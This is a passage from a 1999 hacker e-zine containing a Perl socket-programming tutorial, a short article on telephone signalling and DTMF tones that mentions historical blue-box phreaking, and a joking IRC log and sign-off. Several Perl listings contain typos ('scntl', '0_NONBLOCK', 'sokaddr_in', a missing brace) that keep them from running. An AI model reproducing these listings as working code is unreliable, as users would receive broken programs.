real-world application, you would prbably read messages with sysread() in and out of a buffer of your own and keep acreful track of what you had just read because it is possible to be interrupted in a read call by a signal. (you would also install signal handlers). As this example demonstrates, establishing a client connection and retrieving some data is pretty simple. A TCP Server Example -------------------- Now its time to write your own server for client1 to connect to. Fisrtly you have to place a socket in the listen state. You'll use another function that is defined in network.pl called makelisten(), whoch is shown in the listing below: 1: sub makelisten { 2: 3: my ($portname, $port, $proto, $servaddr); 4: $portname = $_[0]; 5: 6: # 7: # port and protocol 8: # 9: $port = getservbyname($portname, 'tcp') or 10: die "getservbyname: cannot get port : $!"; 11: $proto = getprotobyname('tcp') or 12: die "getprotobyname: cannot get proto : $!"; 13: 14: # 15: # Bind an inet address 16: # 17: socket(LISTFD, PF_INET, SOCK_STREAM, $proto); 18: bind (LISTFD, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; 19: listen (LISTFD, SOMAXCONN) or die "listen: $!"; 20: return LISTFD; 21: } The makelisten() function creates a TCP socket, binds it to a local address, and then places it in the listen state. Lines 9 and 11 retrieve the same information that makeconn() retrieves in order to create a connection, with the exception of an internet address. makelisten() then creates an internet family SOCK_STREAM socket, which by definition is a TCP socket, but you specifiy this explicitely anyway, as you do in makeconn(). In line 18, the socket is bound to a local address. This tells the system that any messages sent to the specified service port and internet address should be relayed to the specified socket. You use sockkaddr_in() to build an address from the service port retrieved with getportbyname() and with a special address that corresponds to all addresses on the workstation so that connections can be made to all network interfaces and even over any dial-up interfaces on the workstation. This function shows a little laziness in that it passes the sockaddr_in() function to bind() instaed of calling it seperatly and saving the results. There are some restrictions on what service ports can be bound. For historical reasons, only the programs executing with root access can bind service ports numbered lower than 1024. After the socket is bound, you can execute listen(), which notefies the system that you're ready to accept client connections. server1, the prgram that uses makelisten(), is just as simple as the client and is shown below. #!/usr/bin/perl use Socket; require "./network.pl"; $hello = "Hello world!"; $LISTFD = makelisten("test"); LOOP: while (1) { unless ($paddr = accept(NEWFD, $LISTFD)) { next LOOP; } syswrite(NEWFD, $hello, length($hello)); close NEWFD; } In the above listing, you simply place a socket in the listen state using makelisten() and then enter a while loop that centres on the function accept(). The purpose of accept() is exactly as it sounds: It accepts client connections. You pass two arguments to accept(): a new variable (NEWFD) that will contain the socket identifier for the accepted connection and the socket ($LISTFD) that has been set up with listen(). Whenever accept() returns a connection, you write a string to the new socket and immediately close it. Before you can test your server, you need to add the entry for the test service that it uses. Add the following three lines to the /etc/services file. You will have to su to root to do this. test 8000/tcp test 8000/udp test1 8001/udp You have added three entries for your test programs, one for TCP and two others for UDP that will be used later. Now to test your server, you need to execute the following commands: $ ./server1& $./client1 iest test Hello world! iest is the hostname of your workstation (ie: lameasfuck). The server writes back your greeting and exits. Because the server is executing inside a while loop, you can run ./client1 repeatedly. Whe the test is finished, use kill to stop the server: $ ps ax| grep server1 | awk '{ print $1 }' pid $ kill pid A UDP Example ------------- To implement the same test in UDP, you have to set up a SOCK_DGRAM socket for both a client and a server. This function, makeudpcli() can also be found in network.pl and is shown below: sub makeudpcli { my ($proto, $servaddr); $proto = getprotobyname('udp') or die "getprotobyname: cannot get proto : $!"; # # Bind a UDP port # socket(DGFD, PF_INET, SOCK_DGRAM, $proto); bind (DGFD, sockaddr_in(0, INADDR_ANY)) or die "bind: $!"; return DGFD; } In this listing you retrieve the protocol information for UDP and then create a SOCK_DGRAM socket. You then bind it, but you tell the system to go ahead and bind to any address and any service port, in other words, you want the socket names but you don't care what the name is. The reason for this extra bind() is quite straightforward. Because USP is connectionless, special attention has to be made to addresses when sending and receiving datagrams. When message datagrams are read, the reader also receives the address of the originator so that it knows where to send any replies. If you want to receive replies to your messages, you need to guaruntee that they come from a unique address. The call to bind() ensures that the system allocates a unique address for you. Now that you have created a datagram socket, you can communicate with a server, using the program listing below, client2. 1: #!/usr/bin/perl 2: 3: use Socket; 4: require "./network.pl"; 5: 6: $poke = "yo!"; 7: 8: $NETFD = makeudpcli(); 9: 10: # 11: # Work out server address 12: # 13: $addr = gethostbyname($ARGV[0]); 14: $port = getservbyname($ARGV[1], 'udp'); 15: 16: $servaddr = sockaddr_in($port, $addr); 17: 18: # 19: # Poke the server 20: # 21: send $NETFD, $poke, 0, $servaddr; 22: 23: # 24: # Recv the reply 25: # 26: recv $NETFD, $message, 32768, 0 or die "error getting message : $!"; 27: print "$message \n"; 28: close $NETFD After you create the socket, you still have to create the server address, but instead of providing this address to the connect() function, you have to provide it to the send() function in Line 21 so it knows where to send the message (funn1ly enuff). You might be wondering why you send anything to the server at all because in the TCP example, the communication is one way. In the TCP example, the server sends a message as soon as you connect and then closes the session. The act of connecting is in effect a message from the client to the server. Because UDP lacks connections, you have to use a message from the client as a trigger for the conversation. The server creates a UDP socket in a lsightly different manner because it needs to bind a well-known port. It uses getservbyname() to retrieve a port number and specifies it as part of the call to bind(). Look at makeudpserv() in network.pl for details. The servers main loop is actually pretty close to that of the TCP server and is shown below, server2: #!/usr/bin/perl # # use Socket; require "./network.pl"; $hello = "Hello world!"; $LISTFD = makeudpserv("test"); while (1) { $cliaddr = recv $LISTFD, $message, 32768, 0; print "Recieved $message from client\n"; send $LISTFD, $hello, 0, $cliaddr; } Instead of waiting for a client by looping on the accept() function, the server loops on the recv() function. There is also no new socket to close after the reply is sent to the client. When thse programs are run, you see the following: $ ./server2& $./client2 iest test Received yo! from client Hello world! So you see that from a programmers standpoint, the differences between TCP and UDP affect not only the socket functions you use and how you use them, but also how you design your programs. Differences such as the lack of a connection and the lack of built-in reliability mechanisms must be seriously considered when you design an application. There is no guaruntee, for example, that the server in this section ever receives your poke message. For that reason, a mechanism such as a timer would would be employed in a real-world application. Blocking Versus Nonblocking Descriptors --------------------------------------- So far, all the examples in this article have relied on blocking I/O. Certain operations, such as reading, writing and connecting or accepting connections, are set to block when they wait for completeion, which brings a program (or thread) to a halt. After server1 sets up a listen, for example, it enters a while loop and calls accept(). Until a client connects to a listening socket, the program is halted. It doesn't repeatedly call accept(), it calls it once and blocks. This is also true of client2, which blocks on the recv() call until the server replies. If the server is unavailable, the program will block forever. This si especially unwise for an application that uses UDP, but how could a timer be implemented if the call to recv() will never return? Writing can also block on TCP connections when the receiver of the data hasn't read enough data to allow the current write to complete.. In order to remain reliability and proper flow control, the systems on both ends of a connection maintain buffers, usually about 8192 bytes. If these buffers are full in either direction, communication in that direction will stop until some space is freed up. This is yet another concern for servers that are writing large messages to clients that aren't running on very powerful systems or are on remote networks with low bandwidth links. In these situations, one client can slow things down for everyone. Blocking I/O is acceptable for programs that don't have to maintain GUI's and only have to maintain one communication channel. Of course, most programs cannot afford to use blocking communications. I/O is said to be 'nonblocking' when an operation returns an error or status code when it cannot be completed. To demonstrate this, run client2 without running the server. It will start and not return until you halt it by pressing Ctrl+C. Now run nonblock: $ ./nonblock error getting message : Try again at ./nonblock line 30 You receive the Try again message from the recv() function. nonblock, shown below, is a modefied version of client2, which was shown earlier in the article. 1: #!/usr/bin/perl 2: use Socket; 3: use Fcntl; 4: require "./network.pl"; 5: $poke = "yo!"; 6: $NETFD = makeudpcli(); 7: scntl $NETFD, &F_SETFL, 0_NONBLOCK or die "Fcntl failed : $!\n"; 8: (rest of file remains the same) A new module, Fcntl, is added to the program in line 3, which provides an interface to the fcntl(2) system call. It is used to alter file descriptor properties, such as blocking and how to handle certain signals. In line 7, the last line of modefications to client2, you set the 0_NONBLOCK flag for the UDP socket. The rest of the prog is unchanged. When nonblocking I/O is used, the application designer has to be very careful when handling errors returned from recv(), send() and other I/O related functions. When no more data is available for reading or no more data can be written, these funcions return error codez. As a result, the application has to be prepared tohandle some errors as being routine conditions. This is also true of the C/C++ interfaces. I/O Multiplexing with UDP ------------------------- Frequently, applications need to maintain more than one socket or file descriptor. For example, many system services such as Telnet, rlogin, and FTP are managed by one process on Linux. In order to do this, the process (inetd) listens for requests for these services by opening a socket for each one. Other applications such as Applix, Netscape, and Xemacs monitor file descriptors for the keyboard, mouse, and maybe the network. Lets set up an example that monitors the keyboard and a network connection. The following listing should be named - udptalk. 1: #!/usr/bin/perl 2: 3: use Socket; 4: require "./network.pl"; 5: 6: $NETFD = makeudpserv($ARGV[2]); 7: 8: $addr = gethostbyname($ARGV[0]); 9: $port = getservbyname($ARGV[1], 'udp'); 10: 11: $servaddr = sockaddr_in($port, $addr); 12: 13: $rin = ""; 14: vec($rin, fileno(STDIN), 1) = 1; 15: vec($rin, fileno($NETFD), 1) = 1; 16: 17: while (1) { 18: 19: select $ready = $rin, undef, undef, undef; 20: 21: if (vec($ready, fileno(STDIN), 1) == 1) { 22: sysread STDIN, $mesg, 256; 23: send $NETFD, $mesg, 0, $servaddr; 24: } 25: if (vec($ready, fileno($NETFD), 1) == 1) { 26: recv $NETFD, $netmsg, 256, 0; 27: print "$netmsg"; 28: $netmsg = ""; 29: } 30: } 31: close $NETFD; In order to test this program, it must be run in either two windows on the same system, or on two different systems. At one command-line session, execute the following command, where 'iest' is the host on which the second command will be run: $ ./udptalk iest test test1 On the second host, run the following command, where 'iest' is the host on which the first command was run: $ ./udptalk iest test1 test Each session will wait for keyboard input. Each line that is typed by one program is printed by the other, after you press Enter. In order to perform the two-way communication required for this, both instances of udptalk have to bind to a well-known port. To permit this on a single workstation, the program accepts two port names as the second and third command line arguments. For obvious reasons, two programs cannot register interest in the same port. In line 6 of the above listing, udptalk uses makeudpserv() to create a UDP socket and bind it to a well known port.. For the examples here I used 8000 for one copy and 8001 for the other. In lines 8-11, you perform the usual procedure for building a network address. This will be the address to which the keyboard input is written. Lines 13-15 build bit vectors in preperation for the select() function. In perl, a 'bit vector' is a scaler variable that is handled as an array of bits, ie: instead of being evaluated as bytes that add up to characters or numbers, each individual bit is evaluated as a distinct value. In line 13, you create a variable ($rin) and tell the perl interpreter to clear it. You then use the vec() and fileno() functions to determine the file number for STDIN (the keyboard) and set that bit in $rin. Then you do the same for the socket created by makeudpcli(). Therefore, if STDIN uses file descriptor 1 (which is generally the case), the second bit in $rin is set to 1. (bit vectors,, like other arrays, start numbering indexes at zero). Fortunatley, the vec() function can be used to read bit vectors also, so you can treat these data structures as opaque (which is nice :)). select() is a key function for systems programmers. Sadly, it suffers from an arcane interface that is intimidating in any language. System V UNIX has a replacement, poll(), that is a little easier to use, but it is not available on Linux or within Perl. The following is the function description for select(): select readfds, writefds, exceptfds, timeout; Like most of the UNIX system interface, this is virtually identical to select() in C/C++. select() is used for discovering which file descriptors are ready for reading, are ready for writing, or have an exceptional condition. An exceptional condition usually corresponds with the arrival of 'out-of-band' or urgent data. This data is most frequently associated with TCP connections. When a message is sent out-of-band, it is tagged as being more important than any previously sent data and is placed at the top of the data queue. A client or server can use this to notify the process on the other end of a connection that is existing immediately. The first three arguments are bit vectors that correspond to the file descriptors that you are interested in reading or writing to or that you are monitoring for exceptional conditions. If you aren't interested in a set of file descriptors, you can pass undef instead of vector. In the udptalk listing, you aren't interested in writing or exceptions, so you pass undef for the second and third arguments. When select returns, only the bits that correspond to files with activity are set, if any descriptors aren't ready when select returns, their settings are lost in the vector.. For that reason, you have select() create a new vector and copy it into $ready. This is done by passing an assignment to select() as the first argument in line 19. The last parameter is the time-out interval in seconds. select() waits for activity for this period. If the period expires with no activity occuring, select() will return with everything in the vector cleared. Because undef is supplied for timeout in line 19, select() will blobk until a file is ready. Inside the while-loop entered in line 17, you call select(), passing it the bit vector built earlier and the new one to be created. When it returns, you check the vector using vec() with pretty much the same syntax as you used to set the bits, however, because you are using == instead of =, vec() returns the value of the bit instead of setting it. If the bit for STDIN is set, you read from the keyboard and send it to the other instance of udptalk. If the bit for the socket is set, you read from it and print it to the terminal. This sequence illustrates a very important advantage of the sockets interface. The program is extracting data to and from the network using the same functions as the keyboard and screen. This program is called 'multiplexing' and is the loop at the core of many network-aware applications, although the actual mechanisms can be concealed by sophisticated dispatchers or notifiers that trigger events based on which connection is ready to be read from or written to.. Something else missing in the udptalk listing is the minimum amount of error checking and signal handling that cleans up connections when a quit signal is received. I/O Multiplexing with TCP ------------------------- In order to demonstrate TCP multiplexing, it is necessary to create different programs for the client and server. The server, tcplisten, is shown below and is the one that requires the most scrutiny. The client, tcptalk is very similar to the server and so I won't print it, but I will explain how the client works as I cover the server. 1: #!/usr/bin/perl 2: 3: use Socket; 4: require "./network.pl"; 5: 6: $NETFD = makelisten($ARGV[0]); 7: 8: while (1) { 9: 10: $paddr = accept(NEWFD, $NETFD); 11: 12: ($port, $iaddr) = sokaddr_in($paddr); 13: 14: print "Accepted connection from ", inet_ntoa($iaddr), 15: " on port number ", $port, "\n"; 16: 17: $rin = ""; 18: vec($rin, fileno(STDIN), 1) = 1; 19: vec($rin, fileno(NEWFD), 1) = 1; 20: 21: while (1) 22: 23: select $ready = $rin, undef, undef, undef; 24: 25: if (vec($ready, fileno(STDIN), 1) == 1) { 26: sysread STDIN, $mesg, 256; 27: syswrite NEWFD, $mesg, length($mesg); 28: } 29: if (vec($ready, fileno(NEWFD), 1) == 1) { 30: $bytes = sysread NEWFD, $netmsg, 256; 31: if ($bytes == 0) { goto EXIT; } 32: print "$netmsg"; 33: $netmsg = ""; 34: } 35: } 36: EXIT; close NEWFD; 37: print "Client closed connection\n"; 38: } 39: 40: close $NETFD; The server creates a listening socket in line 6 and then immediately enters a while loop. At the top of the loop is a call to accept(). By placing this in a loop, the server can repeatedly accept client connections, like the other TCP server. The listen socket, $NETFD, can accept more than one connection, regardless of the state of any file descriptors cloned from it using accept(). accept() returns the address of the connecting client. You use this address in lines 12 and 14 to print out some information about the client. In line 12 you use sockaddr_in() to reverse engineer the fully qualified address back into a network address and a service port. Then you use print to display it on the terminal. Note the call to inet_ntoa() embedded in the print command. Then you set up for a select() loop using almost the same code as in the udptalk listing. There is, however, a key difference in the way the network connection is handled. You are reading with sysread() again, but you are saving the return value. When a peer closes a TCP connection, the other program receives an EOF indication. This is signified by marking the socket as ready for reading and returning zero bytes when it is read.. By saving the number of bytes returned by sysread(), you are able to detect a closed connection and record it and then return to accept() at the top of the outer while loop. The following is a server session, followed by a client session that is communicating with it. The client tcptalk, is a copy of tcplisten. $ ./tcplisten test Accepted connection from 10.8.100.20 on port number 29337 Hello, world. Goodbye, cruel.... Client closed connection $ ./tcptalk iest test Hello, world. Goodbye, cruel.... ^C Advanced Topics --------------- One of the biggest issues of TCP applications is queueing messages. Depending on the nature of the data being transferred, the network bandwidth available, and the rate at which clients can keep pace with the data being delivered, data can be queue up. Experienced application desingners geberally specify a queuing mechanism and the rules associated with it as part of the initial product description. UDP applications have to wrestle with data reliability, and some schemes rely on message sequence numbers. All nodes involved in a transaction (or a series of transactions) keep track of a numbering scheme. When a node receives a message out of order, it sends a negative acknowledgement for the message that it missed. This sort of scheme greatly reduces traffic when everything goes well but can become very expensive when things fall out of sequence. Some applications can use asynchronous I/O in order to service network traffic and other tasks in a single application. This scheme registers interest in a signal that can be delivered whenever a file descriptor has data ready to be read. This ,ethod is not recommedned though, because only one signal can be delivered for all file descriptors (so select() would still be needed) and because signals are not reliable. Secur1ty is always a big issue, regardless of the protocols being used. UDP is being used less and less over the Internet, essentially because it is very easy to impersonate a host when no connections are required. Even TCP connections, however, can be spoofed by someone who has an understanding of the Internet Protocol and WAN technology. For that reason, applications that require a high level of security don't rely on TCP to keep them secure and tend to use encryption and authentication technology. Summary ------- Okay, this article covers a lot of ground in a short time. I can't be bothered to write a proper summary so this is gonna be it, I hope that this has given you enough information but if not then you can just mail me at the address at the top of this file. Peace. Shouts ------ [hybrid] [jasun] [force] [shadowx] [knight] [devious] [frink] [sintax] -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Network Signalling ]:::[OO--[ by shadowx ]--[ ]::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ ]::::::::::::::::::::::::::::::::::: Signalling Between your Phone and the Network By Shadow-x ~~~~~~~~~~~~~~~~~~~~~ So you pick up your phone dial the number and your call is connected, but how does the information get sent from your phone to the network in the first place? Call setup information can only be sent within the bandwidth restrictions established for voice communications. This means that any signalling between telephone set and the telephone network must happen within the frequency confines of the 4,000 Hz bandwidth restrictions. Excuse the crap ascii art, In Band Signalling | <---------------><------> Out of Band Signalling |__________________________> Hz ^ ^ ^ 300 3,300 4,000 Signalling information sent as tones or pulses within the standard voice bandwidth are called in band signals, where those sent at frequencies outside of the standard frequency range are called out of band signals. The reason the CCITT5 telephone system was so heavily abused was because it allowed its trunks to be seized through in band signalling. So tones used to set up calls at the local exchange could be made from any regular phone, allowing any phone phreak with a blue box to create the tones to gain as much control over the line as the local operator. On the modern C7 system all this is done in the out of bandwidth area. As the network is an electrical device it requires a closed, or continuous path over which current can flow between the network and your phone (aka your phone line). When an electrical switch is opened, the path is broken and no current can flow so electrical power stops. When the electrical switch is closed, current can now flow over the continuous path and electrical power is available. It is this presence of electrical current that provides the initial signalling to the telephone network that a caller wants to place a telephone call. When the telephone receiver is resting in the cradle of the telephone set the switch hook is depressed which opens the path for current flow from the telephone network and no current is allowed to flow, this is referred to as the 'on hook position'. When the receiver is lifted, the switch hook button is released and the path for current from the telephone network is completed, which is referred to as the 'off hook' position. Power for your phone line is now supplied from a battery located at the central office. The electric current now flowing from the central office to your line is known as the loop current. This loop of wire that extends from the central office to the customers line and back to the central office is referred to as the local loop. Switch hook ************ ***** *********** *telephones*------*-\-*------------------*Central * *electronic* * * Tip & Ring *Office * *components*------*-\-*------------------*(battery)* ************ ***** *********** (this switch is closed when the receiver is off hook) When the telephone network detects the flow of loop current to the telephone set, it sends a tone down the line to the telephone set receiver which is referred to as the 'dial tone'. This is a notification from the network to let you know that it is ready to receive your dialing instructions. The dial tone is actually a combination of 350hz and 440hz sine waves (for all of you with blue beep). These frequencies are both within the 4,000 hz voice bandwidth. so what about the dialing mechanism for the phone? The old method used on some of the older phones and networks for dialing was rotary dialing also known as pulse dialing which sends a number of electrical pulses down the telephone line equal to the number dialed. So if the number 3 was dialed the connection between your phone set and the central office would open and close 3 times. For some messed up reason some people seem to get the idea that if they tap out the numbers on the switch hook of their DTMF phone they get free calls because they didn't actually dial any numbers but all they are doing is pulse dialing. To keep the network from interpreting the opening/closing of the dial pulse as being a depressed switch hook, specific timing restrictions are placed on pulses and valid switch hook flashes. A rotary phone generates up to 10 pulses per second, with each pulse around 1/20th of a second in duration and around 1/20th of a second time delay between pulses. The network also expects around a 7/10th of a second delay between the different digits dialed. A valid flashing of the switch hook must see the connection open for a specific period of time known as a hook flash. The method above was quite slow and time consuming and so a new method of dialing using tones instead of pulses was developed. As you all know DTMF dialing uses a keypad with 12 buttons for input. Each row and column of the keypad corresponds to a certain tone and creates a specific frequency. Each button lies at the intersection of two tones. When the button is pressed, the two tones are generated by the telephone set and sent over the local loop connection to the central office, which can read the different tones and understand which number out of the millions in the world you are trying to connect to. The DTMF dialing pad: 1209hz 1336hz 1477hz 697hz 1 2 3 770hz 4 5 6 852hz 7 8 9 941hz * 0 # 2 = 697hz + 1336hz For example pressing the number 2, simultaneously generates both an 697hz and 1336hz tone. These tones are sent over the local loop and received by the central office switching equipment. Since multiple frequency's are available and pressing a key generates a specific dual tone combination this type of dialing is known as dual tone multiple frequency (DTMF) dialing. Anyway thats the basics of it, later ..... -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->[OO]:::::::::::::::[ Outness ]:::::::::::::::::::::::::::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: [22:33] <[cyborg]> z0mna: you are so cool [22:34] <[cyborg]> really you are! i know dood [22:34] <[cyborg]> you r0ck i know [22:34] hehe [22:34] <[cyborg]> no really, you 0wn the most dood [22:34] u do! [22:35] * [cyborg] sings the U2 song 'the sweetest thing' as a tribute to z0mba [22:35] <[cyborg]> oho.. the leetest thing [22:35] <[cyborg]> z0mba is the leetest thing i know goddamnit [22:35] lol [22:35] *** [cyborg] was kicked by z0mba ( take your lips off my ass ) Well there it is, a quality issue of f41th composed by yours truly, just remember who provided you will all this mad o-day inph0z, it was and always will be the men, women and children of D4RKCYDE [darkcyde.phunc.com]. P34C3 Y'4LL. ----------------------------------------------------------------------------- [ http://darkcyde.phunc.com ] main darkcyde site. [ http://attrition.org ] f41th mirror. [ http://hybrid.dtmf.org ] hybrid's phone security site. [ http://epidemik.org ] fear the epidemik. [ O11 +44 (O)19O4 783 489 ] official BBS distro for D4RKCYDE. 24/7. Notice: f41th is a production of D4RKCYDE [c] 1999. All information provided in this zine is purely for entertainment purposes only, we may skool you, but we don't encourage you. To submit an article to f41th, send to hybrid@dtmf.org or cometo #darkcyde on efnet. If you wish to mirror f41th magazine, please email any of the D4RKCYDE members before hand. Thankyou for reading this notice. ______ ______ _ _ _______ __ __ ______ _______ | \ |_____/ |____/ | \_/ | \ |______ |_____/ | \_ | \_ |_____ | |_____/ |______ [ #darkcyde EFNET - http://darkcyde.phunc.com ] " ... find us on the pstn b1tch ... " +++ NO CARRIER